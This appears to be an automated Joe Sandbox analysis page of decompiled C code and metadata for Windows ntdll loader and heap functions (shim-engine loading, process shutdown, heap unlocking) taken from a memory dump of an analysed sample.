                                                    0x1d83fb15
                                                    0x00000000
                                                    0x1d83faa0
                                                    0x1d83f9d7
                                                    0x1d83f9da
                                                    0x1d83f9f9
                                                    0x1d83f9fe
                                                    0x1d83f9dc
                                                    0x1d83f9f1
                                                    0x1d83f9f6
                                                    0x1d83fa0f
                                                    0x00000000
                                                    0x1d83fa15
                                                    0x1d83f921
                                                    0x1d83f926
                                                    0x1d83f92e
                                                    0x1d83f936
                                                    0x1d83fba2
                                                    0x1d83fba5
                                                    0x1d83fbb1
                                                    0x1d83fbb1

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                    • API String ID: 3446177414-3492000579
                                                    • Opcode ID: c3ae5ec4af4c351b42ecccb399d76d29ee83f7766b946fed3e373b9d832614c3
                                                    • Instruction ID: 67928d2e795fe1028695723943cb2014dc3715b69e0cb8afd8bcbdb9dbee6d4f
                                                    • Opcode Fuzzy Hash: c3ae5ec4af4c351b42ecccb399d76d29ee83f7766b946fed3e373b9d832614c3
                                                    • Instruction Fuzzy Hash: 6371D276904689EFCB02DF6CD4906ADFBF2FF48215F05805AE5899B262C735E940CBD2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D786565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E1D786565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x1d88b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E1D7AE8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x1d889200; // 0x0
				_t113 = 0x20;
				 *0x1d8865f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E1D7BE7E0(_t92, _v92);
					}
					_t114 =  *0x1d889210; // 0x0
					asm("ror esi, cl");
					 *0x1d8891e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x1d889218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E1D79FED0(0x1d8832d8);
					_t98 = 0x1d885d8c;
					if( *0x1d8865f0 != 0) {
						_t56 =  *0x1d885d8c; // 0x18e2d98
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x1d885d8c; // 0x18e2d98
						if( *0x1d8865f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x1d8865f0 = 1;
							 *0x1d8865f8 = 0;
							E1D79E740(_t98);
							E1D78676F(_t98);
							return E1D7D4B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d8832d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x18e2d60
								_t98 =  *_t24;
								E1D786704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x1d885d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E1D7D5050(_t92,  &_v108, _t110);
					_t92 = E1D786B45( &_v108,  &_v92, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x1d8837c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E1D80E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x1d8837c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E1D7C7DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x1d8891e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E1D7AD3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E1D7B16EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x1d8837c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E1D80E692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x1d8837c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E1D811D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E1D7D2C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}































                                                    0x1d786574
                                                    0x1d78657d
                                                    0x1d786581
                                                    0x1d78658b
                                                    0x1d786590
                                                    0x1d786598
                                                    0x1d7865a3
                                                    0x1d7865a6
                                                    0x1d7865ad
                                                    0x1d7865b1
                                                    0x1d7865b3
                                                    0x1d7865b8
                                                    0x1d786637
                                                    0x1d786637
                                                    0x1d78663a
                                                    0x1d78663e
                                                    0x1d7866fa
                                                    0x1d7866fa
                                                    0x1d78664c
                                                    0x1d786659
                                                    0x1d78665f
                                                    0x1d786665
                                                    0x1d786667
                                                    0x1d78666f
                                                    0x1d786678
                                                    0x1d78667d
                                                    0x1d786684
                                                    0x1d786686
                                                    0x1d786692
                                                    0x1d786697
                                                    0x1d7e98c3
                                                    0x1d7e98d3
                                                    0x1d7e98d3
                                                    0x1d7e98d5
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7e98ca
                                                    0x1d7e98cd
                                                    0x1d7e98cd
                                                    0x1d7e98cd
                                                    0x1d7e98d1
                                                    0x1d7e98d1
                                                    0x00000000
                                                    0x1d78669d
                                                    0x1d78669d
                                                    0x1d7866a4
                                                    0x1d7866aa
                                                    0x1d7866ac
                                                    0x1d7866ac
                                                    0x1d7866b0
                                                    0x1d7866c9
                                                    0x1d7866cb
                                                    0x1d7866d7
                                                    0x1d7866dc
                                                    0x1d7866e1
                                                    0x1d7866f6
                                                    0x1d7866b2
                                                    0x1d7866b2
                                                    0x1d7866b2
                                                    0x1d7866b5
                                                    0x1d7866b7
                                                    0x1d7866b7
                                                    0x1d7866ba
                                                    0x1d7866bf
                                                    0x1d7866c1
                                                    0x00000000
                                                    0x1d7866b2
                                                    0x1d7866b0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7865ba
                                                    0x1d7865ba
                                                    0x1d7865bf
                                                    0x1d7865d5
                                                    0x1d7865d9
                                                    0x1d7e9835
                                                    0x1d7e983a
                                                    0x1d7e983c
                                                    0x1d7e983e
                                                    0x1d7e9859
                                                    0x1d7e985e
                                                    0x1d7e9863
                                                    0x1d7e9863
                                                    0x1d7e9866
                                                    0x1d7e9868
                                                    0x1d7e986a
                                                    0x1d7e986a
                                                    0x1d7e986d
                                                    0x00000000
                                                    0x1d7e986d
                                                    0x1d7865e2
                                                    0x1d7865ec
                                                    0x1d7865f1
                                                    0x1d7865f4
                                                    0x1d7865f7
                                                    0x1d7865fb
                                                    0x1d78660f
                                                    0x1d786614
                                                    0x1d78661a
                                                    0x1d78661c
                                                    0x1d78661f
                                                    0x00000000
                                                    0x1d78661f
                                                    0x1d786602
                                                    0x1d786606
                                                    0x1d7e9875
                                                    0x1d7e987a
                                                    0x1d7e987c
                                                    0x1d7e987e
                                                    0x1d7e9880
                                                    0x1d7e989a
                                                    0x1d7e989f
                                                    0x1d7e98a4
                                                    0x1d7e98a7
                                                    0x1d7e98a9
                                                    0x1d7e98ab
                                                    0x1d7e98ab
                                                    0x1d7e98ac
                                                    0x1d7e98ae
                                                    0x1d7e98b3
                                                    0x1d7e98b4
                                                    0x1d7e98b6
                                                    0x1d7e98bd
                                                    0x00000000
                                                    0x1d7e98bd
                                                    0x1d78660c
                                                    0x00000000
                                                    0x1d786624
                                                    0x1d78662a
                                                    0x1d78662f
                                                    0x1d786636
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D7E9843
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 1D7E9854, 1D7E9895
                                                    • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1D7E9885
                                                    • LdrpLoadShimEngine, xrefs: 1D7E984A, 1D7E988B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 3446177414-3589223738
                                                    • Opcode ID: aa781dcf1665efe64918cd9021eb8b39b17c62fb9f0a7030f3b59fb0b96b8fde
                                                    • Instruction ID: 5231f877435e6c1b6a611554defcb6b32ef272051fcd041951d157f6beaec640
                                                    • Opcode Fuzzy Hash: aa781dcf1665efe64918cd9021eb8b39b17c62fb9f0a7030f3b59fb0b96b8fde
                                                    • Instruction Fuzzy Hash: 57511636B042A4AFCB05DBACCC98BAD77B6BB44364F050126E551EF2A6DB70AC41C752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7BD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E1D7BD6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x1d86c5e8);
				_t68 = E1D7E7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x1d885da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x1d8837c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E1D80E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d885dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d885da8 = 1;
				if( *0x1d8865f0 != 0) {
					_t137 =  *0x1d8891f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x1d8891e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E1D794779(_t74, _t118);
				}
				if(( *0x1d88391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x1d889234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x1d889234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x1d8868c8;
					if( *0x1d8868c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E1D810FC8();
							 *0x1d8868c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E1D7BD8F0();
					}
					_t68 = E1D7BD898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x1d885da0; // 0x190cec0
				L8:
				if(_t129 != 0x1d885d9c) {
					_t18 = _t129 - 0x10; // 0x190ceb0
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x190ce10
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x742a91a0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E1D7ADC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E1D7AF0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E1D7ADCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E1D7BD886();
					}
					goto L8;
				}
				_t119 =  *0x1d885b24; // 0x18e2d98
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E1D7ADC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x1d885b24; // 0x18e2d98
					E1D7AF0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E1D7BD88F();
				}
				goto L15;
			}


























                                                    0x1d7bd6d0
                                                    0x1d7bd6d2
                                                    0x1d7bd6d7
                                                    0x1d7bd6dc
                                                    0x1d7bd6e3
                                                    0x1d7bd6ed
                                                    0x1d7bd810
                                                    0x1d7bd813
                                                    0x1d7bd81f
                                                    0x1d7bd81f
                                                    0x1d7bd6f3
                                                    0x1d7bd6f9
                                                    0x1d7bd6fc
                                                    0x1d7bd6ff
                                                    0x1d7bd702
                                                    0x1d7bd709
                                                    0x1d7ff0c2
                                                    0x1d7ff0c2
                                                    0x1d7bd716
                                                    0x1d7ff0cd
                                                    0x1d7ff0e7
                                                    0x1d7ff0ec
                                                    0x1d7ff0ec
                                                    0x1d7bd71c
                                                    0x1d7bd71f
                                                    0x1d7bd724
                                                    0x1d7bd732
                                                    0x1d7bd86d
                                                    0x1d7bd873
                                                    0x1d7bd875
                                                    0x1d7bd877
                                                    0x1d7bd879
                                                    0x1d7bd87f
                                                    0x1d7bd87f
                                                    0x1d7bd738
                                                    0x1d7bd740
                                                    0x1d7bd742
                                                    0x1d7bd744
                                                    0x1d7bd744
                                                    0x1d7bd750
                                                    0x1d7ff0f4
                                                    0x1d7ff0f7
                                                    0x1d7ff0fe
                                                    0x1d7ff101
                                                    0x1d7ff108
                                                    0x1d7ff10b
                                                    0x1d7ff10d
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ff113
                                                    0x1d7ff117
                                                    0x1d7bd7ed
                                                    0x1d7bd7ed
                                                    0x1d7bd7f3
                                                    0x1d7bd7fa
                                                    0x1d7ff13c
                                                    0x1d7ff13f
                                                    0x1d7ff145
                                                    0x1d7ff14a
                                                    0x1d7ff14a
                                                    0x1d7ff13f
                                                    0x1d7bd800
                                                    0x1d7bd804
                                                    0x1d7bd806
                                                    0x1d7bd806
                                                    0x1d7bd80b
                                                    0x00000000
                                                    0x1d7bd80b
                                                    0x1d7bd756
                                                    0x1d7bd756
                                                    0x1d7bd75a
                                                    0x1d7bd75d
                                                    0x1d7bd766
                                                    0x1d7bd76c
                                                    0x1d7bd76e
                                                    0x1d7bd76e
                                                    0x1d7bd771
                                                    0x1d7bd774
                                                    0x1d7bd774
                                                    0x1d7bd777
                                                    0x1d7bd77a
                                                    0x1d7bd77a
                                                    0x1d7bd77d
                                                    0x1d7bd782
                                                    0x1d7bd78d
                                                    0x1d7bd794
                                                    0x1d7bd799
                                                    0x1d7bd79f
                                                    0x1d7bd79f
                                                    0x1d7bd7a1
                                                    0x1d7bd7a7
                                                    0x1d7bd7ac
                                                    0x1d7bd7af
                                                    0x1d7bd7b2
                                                    0x1d7bd7b6
                                                    0x1d7bd7da
                                                    0x1d7bd7da
                                                    0x1d7bd7b8
                                                    0x1d7bd7b9
                                                    0x1d7bd7c0
                                                    0x1d7bd7c5
                                                    0x1d7bd7cc
                                                    0x1d7bd7cf
                                                    0x1d7bd7cf
                                                    0x00000000
                                                    0x1d7bd782
                                                    0x1d7bd7e1
                                                    0x1d7bd7e7
                                                    0x1d7bd7eb
                                                    0x1d7bd820
                                                    0x1d7bd827
                                                    0x1d7bd82c
                                                    0x1d7bd832
                                                    0x1d7bd834
                                                    0x1d7bd83a
                                                    0x1d7bd83f
                                                    0x1d7bd842
                                                    0x1d7bd84a
                                                    0x1d7bd84f
                                                    0x1d7bd856
                                                    0x1d7bd856
                                                    0x00000000

                                                    APIs
                                                    • RtlDebugPrintTimes.NTDLL ref: 1D7BD879
                                                      • Part of subcall function 1D794779: RtlDebugPrintTimes.NTDLL ref: 1D794817
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 3446177414-1975516107
                                                    • Opcode ID: a46e3dd87fdeee4ed1f3fa69ce17e18b46c574f9472459b953c044f796c92042
                                                    • Instruction ID: fa6328b1c21d77f0e4ae21e24b06472d891441420e675444c801e3f075d6b258
                                                    • Opcode Fuzzy Hash: a46e3dd87fdeee4ed1f3fa69ce17e18b46c574f9472459b953c044f796c92042
                                                    • Instruction Fuzzy Hash: 32513275A042558FCB06CFACC4887EDBBB1FF08324F15816AD906AB291D730A846CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7BDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 19%
                                                    			E1D7BDA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E1D859335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D84F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x1d88376c; // 0x0
					 *0x1d8891e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D78B910();
					} else {
						E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D78B910("Invalid heap signature for heap at %p", _t93);
					E1D78B910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E1D78B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8847a1 = 1;
						asm("int3");
						 *0x1d8847a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E1D82AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E1D7BFEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E1D7BBAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E1D7BF300(_t92, _t74);
					}
				}
				goto L6;
			}



















                                                    0x1d7bda2a
                                                    0x1d7bda35
                                                    0x1d7ff408
                                                    0x1d7bda90
                                                    0x1d7bda96
                                                    0x1d7bda9b
                                                    0x1d7ff510
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ff51f
                                                    0x1d7bdaa6
                                                    0x1d7bdaa9
                                                    0x1d7ff537
                                                    0x1d7ff53f
                                                    0x1d7ff53f
                                                    0x1d7ff537
                                                    0x00000000
                                                    0x1d7bdaaf
                                                    0x1d7bdaa1
                                                    0x1d7bdaa1
                                                    0x00000000
                                                    0x1d7bdaa1
                                                    0x1d7bda42
                                                    0x1d7ff413
                                                    0x1d7ff41b
                                                    0x00000000
                                                    0x1d7ff421
                                                    0x1d7bda4f
                                                    0x1d7ff432
                                                    0x1d7ff451
                                                    0x1d7ff456
                                                    0x1d7ff434
                                                    0x1d7ff449
                                                    0x1d7ff44e
                                                    0x1d7ff462
                                                    0x1d7ff471
                                                    0x1d7ff476
                                                    0x1d7ff47b
                                                    0x1d7ff48d
                                                    0x1d7ff48f
                                                    0x1d7ff496
                                                    0x1d7ff497
                                                    0x1d7ff497
                                                    0x00000000
                                                    0x1d7ff49e
                                                    0x1d7bda59
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bda5b
                                                    0x1d7bda66
                                                    0x1d7bda6d
                                                    0x1d7bda6d
                                                    0x1d7bda71
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bda73
                                                    0x1d7bda77
                                                    0x1d7bda7f
                                                    0x1d7bda80
                                                    0x1d7bda84
                                                    0x1d7bda8a
                                                    0x1d7ff4a8
                                                    0x1d7ff4ab
                                                    0x1d7ff4ab
                                                    0x1d7ff4b0
                                                    0x1d7ff4b3
                                                    0x1d7ff4b8
                                                    0x1d7ff4c1
                                                    0x1d7ff4c1
                                                    0x1d7ff4c4
                                                    0x1d7ff4c8
                                                    0x1d7ff4cb
                                                    0x1d7ff4ce
                                                    0x1d7ff4d5
                                                    0x1d7ff4d8
                                                    0x1d7ff4db
                                                    0x1d7ff4e1
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ff4e7
                                                    0x1d7ff4ec
                                                    0x1d7ff4ec
                                                    0x1d7ff4f0
                                                    0x1d7ff4f3
                                                    0x1d7ff4f9
                                                    0x1d7ff503
                                                    0x1d7ff503
                                                    0x1d7ff4f9
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                    • API String ID: 3446177414-3224558752
                                                    • Opcode ID: 87aebd0e8614d9e05c7290c5a293ad67d625d55c5ab7189e12ef41f6bb8cd047
                                                    • Instruction ID: 78891186f3976defe6519010fb48ce266133dfc0ca66ab5a490cdfe27b1f6903
                                                    • Opcode Fuzzy Hash: 87aebd0e8614d9e05c7290c5a293ad67d625d55c5ab7189e12ef41f6bb8cd047
                                                    • Instruction Fuzzy Hash: AE411532908645DFD712DF28C884BB9F7A4FF40734F00856AE91697791CB38A984C7A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D83ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • ---------------------------------------, xrefs: 1D83EDF9
                                                    • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1D83EDE3
                                                    • HEAP: , xrefs: 1D83ECDD
                                                    • Entry Heap Size , xrefs: 1D83EDED
                                                    Memory Dump Source
